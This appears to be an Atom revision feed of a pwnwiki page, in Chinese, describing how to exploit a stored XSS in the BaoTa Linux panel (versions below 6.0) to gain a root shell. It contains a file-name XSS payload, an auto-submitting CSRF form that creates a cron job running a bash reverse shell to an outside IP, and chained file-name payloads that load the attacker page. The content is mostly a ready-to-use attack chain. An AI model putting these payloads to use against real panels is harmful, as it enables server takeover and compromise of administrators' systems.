<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AF%B6%E5%A1%94linux%E9%9D%A2%E6%9D%BF_6.0_%E5%AD%98%E5%84%B2%E5%9E%8BXSS_Getshell%E6%BC%8F%E6%B4%9E%2Fzh-cn</id>
	<title>寶塔linux面板 6.0 存儲型XSS Getshell漏洞/zh-cn - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%AF%B6%E5%A1%94linux%E9%9D%A2%E6%9D%BF_6.0_%E5%AD%98%E5%84%B2%E5%9E%8BXSS_Getshell%E6%BC%8F%E6%B4%9E%2Fzh-cn"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94linux%E9%9D%A2%E6%9D%BF_6.0_%E5%AD%98%E5%84%B2%E5%9E%8BXSS_Getshell%E6%BC%8F%E6%B4%9E/zh-cn&amp;action=history"/>
	<updated>2026-04-17T00:09:25Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94linux%E9%9D%A2%E6%9D%BF_6.0_%E5%AD%98%E5%84%B2%E5%9E%8BXSS_Getshell%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=5980&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;宝塔linux面板 6.0 存储型XSS Getshell漏洞&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AF%B6%E5%A1%94linux%E9%9D%A2%E6%9D%BF_6.0_%E5%AD%98%E5%84%B2%E5%9E%8BXSS_Getshell%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=5980&amp;oldid=prev"/>
		<updated>2021-06-26T00:13:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;宝塔linux面板 6.0 存储型XSS Getshell漏洞&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==漏洞影响==&lt;br /&gt;
宝塔Linux面板&amp;lt;6.0&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
在web目录下上传一个文件名为&amp;lt;code&amp;gt;&amp;lt;img src=x onerror=&amp;quot;alert(1)&amp;quot;&amp;gt;&amp;lt;/code&amp;gt;的文件&lt;br /&gt;
宝塔后台浏览文件,触发payload&lt;br /&gt;
&lt;br /&gt;
Get cookie:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
  &amp;lt;!-- CSRF PoC - generated by Burp Suite Professional --&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;script&amp;gt;history.pushState('', '', '/')&amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;form action=&amp;quot;http://1.1.1.1:8888/crontab?action=AddCrontab&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;name&amp;quot; value=&amp;quot;test&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;type&amp;quot; value=&amp;quot;minute-n&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;where1&amp;quot; value=&amp;quot;5&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;hour&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;minute&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;week&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;sType&amp;quot; value=&amp;quot;toShell&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;sBody&amp;quot; value=&amp;quot;bash -i &amp;gt;&amp;amp; /dev/tcp/1.1.1.1/1998 0&amp;gt;&amp;amp;1&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;sName&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;backupTo&amp;quot; value=&amp;quot;localhost&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;urladdress&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;save&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;sBody&amp;quot; value=&amp;quot;bash -i &amp;gt;&amp;amp; /dev/tcp/1.1.1.1/1998 0&amp;gt;&amp;amp;1&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;urladdress&amp;quot; value=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;submit&amp;quot; id=&amp;quot;a&amp;quot; value=&amp;quot;Submit request&amp;quot; /&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
  &amp;lt;/body&amp;gt;&lt;br /&gt;
  &amp;lt;script&amp;gt;&lt;br /&gt;
    document.getElementById('a').click()&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
修改poc中的ip地址,上传到test.com中,当宝塔管理员访问这个页面以后,会自动添加反弹shell的计划任务&lt;br /&gt;
&lt;br /&gt;
新建三个文件,文件名分别为：&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
a&amp;lt;img src=x onerror=&amp;quot;a=String.fromCharCode(47)&amp;quot;&amp;gt;&lt;br /&gt;
b&amp;lt;img src=x onerror=&amp;quot;b='.com'&amp;quot;&amp;gt;&lt;br /&gt;
c&amp;lt;img src=x onerror=&amp;quot;window.open(a+a+'test'+b)&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
payload触发以后会自动打开test.com网页&lt;br /&gt;
&lt;br /&gt;
将上一步CSRF的payload部署到test.com,管理员浏览文件的时候即可触发,触发后五分钟会反弹shell（ROOT权限）&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>